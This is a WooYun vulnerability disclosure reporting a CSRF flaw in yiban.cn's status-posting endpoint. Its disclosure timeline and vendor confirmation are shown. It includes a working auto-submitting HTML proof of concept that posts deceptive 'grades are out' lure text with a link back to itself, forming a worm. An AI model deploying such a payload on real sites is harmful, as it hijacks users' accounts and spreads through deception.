当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136624

漏洞标题:易班网某处csrf可形成蠕虫(附poc)

相关厂商:yiban.cn

漏洞作者: 番茄师傅

提交时间:2015-09-01 15:11

修复时间:2015-10-21 09:14

公开时间:2015-10-21 09:14

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经确认,细节仅向厂商公开
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

易班网某处csrf可形成蠕虫(附poc)

详细说明:

发送动态处的post包中没有加token 也没有验证refer 导致csrf蠕虫

78E131C2-FCEF-47B9-BBFF-ACD02F7E6B11.png


构造poc

<html>
<body>
<form action="http://www.yiban.cn/feed/add" method="POST">
<input type="hidden" name="content" value="%E7%8F%AD%E4%B8%8A%E7%9A%84%E6%88%90%E7%BB%A9%E5%B7%B2%E7%BB%8F%E5%87%BA%E6%9D%A5%E4%BA%86%EF%BC%8C%E6%B2%A1%E6%83%B3%E5%88%B0%E6%88%91%E4%BC%9A%E8%BF%9B%E6%AD%A5%E8%BF%99%E4%B9%88%E5%A4%9A%E3%80%82%E6%88%90%E7%BB%A9%E8%A1%A8%EF%BC%9Ahttp%3A%2F%2Fdwz.cn%2F1u18Ys" />
<script> document.forms[0].submit(); </script>
</body>
</html>


该poc执行会自动发送一条动态
动态内容为:班上的成绩已经出来了,没想到我会进步这么多。成绩表:http://dwz.cn/1u18Ys ,而后面的链接就是poc的地址,以此方式形成蠕虫


B4D61610-CFD0-4270-B4A0-7B3830503C3C.png


poc地址 http://xss.gift/yibancsrf.html


漏洞证明:

B4D61610-CFD0-4270-B4A0-7B3830503C3C.png


poc地址 http://xss.gift/yibancsrf.html


修复方案:

有礼物吗?

版权声明:转载请注明来源 番茄师傅@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-09-06 09:12

厂商回复:

已安排安全开发修复,谢谢对易班安全的关注

最新状态:

暂无